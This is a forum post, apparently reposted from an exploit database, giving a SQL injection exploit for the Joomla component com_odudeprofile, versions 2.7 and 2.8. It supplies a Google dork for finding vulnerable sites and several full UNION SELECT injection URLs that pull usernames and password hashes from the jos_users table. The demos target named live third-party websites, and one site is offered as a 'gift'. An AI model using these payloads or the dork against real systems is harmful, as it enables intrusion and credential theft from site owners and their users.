Jump to content
Search In
  • More options...
Find results that contain...
Find results in...
Wubi

Joomla Component com_odudeprofile SQLi

By Wubi, in Exploituri

Recommended Posts

Wubi Newbie

Wubi

Posted
Posted

Joomla Component com_odudeprofile SQL Injection Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode

  • Exploit Title: Joomla com_odudeprofile V2.x Exploit
  • Google Dork: inurl:index.php?option=com_odudeprofile
  • Date: [24-07-2012]
  • Author: Daniel Barragan "D4NB4R"
  • Twitter: @D4NB4R
  • site: Poison Security
  • Vendor: ODude Network
  • Version: 2.7 & 2.8
  • Download: ODude Profile 2.8
  • License: Non-Commercial
  • Tested on: [Linux(arch)-Windows(7ultimate)]

______________________________________________________________________________________

 Exploit Title: Joomla com_odudeprofile V2.x Exploit

 Google Dork: inurl:index.php?option=com_odudeprofile

 Date: [24-07-2012]

 Author: Daniel Barragan "D4NB4R"

 Twitter: @D4NB4R

 site: http://poisonsecurity.wordpress.com/

 Vendor: http://www.odude.com

 Version: 2.7 & 2.8

 Download: http://www.odude.com/home/profile.html

 License: Non-Commercial

 Tested on: [Linux(arch)-Windows(7ultimate)]

______________________________________________________________________________________

  Test:

  http://127.0.0.1/index.php?option=com_odudeprofile&view=search&profession=idtrue%27


  Sql:

  http://127.0.0.1/index.php?option=com_odudeprofile&view=search&profession=(SQL) 


demo1:

http://genteagro.com/index.php?option=com_odudeprofile&view=search&profession=999999.9%27%20union%20all%20select%200x31303235343830303536%2C%28select%20concat%28username,0x3D,password%29%20from%20jos_users%29%20%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--%20D4NB4R%20demo2:

Demo2

http://www.eveproducciones.com.mx/perfil/index.php?option=com_odudeprofile&view=search&profession=999999.9%27%20union%20all%20select%200x31303235343830303536%2C%28select%20concat%28jos_users.username,0x3D,jos_users.password%29%20from%20%60eveprodu_joomesp%60.jos_users%20Order%20by%20username%20limit%200,1%29%20%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--%20d4nb4r

demo3:

http://www.urbansky.co.za/index.php?option=com_odudeprofile&view=search&profession=999999.9.9%27%20union%20all%20select%200x31303235343830303536%2Cconcat%28unhex%28Hex%28cast%28database%28%29%20as%20char%29%29%29%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--%20D4NB4R



      Gift: 
                     http://www.eveproducciones.com.mx/perfil/



Im not responsible for which is given
No me hago responsable del uso que se le de
_______________________________________________________________________________________
Daniel Barragan "D4NB4R"  


# 1337day.com [2012-07-25]

Sursa: Joomla Component com_odudeprofile SQL Injection Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...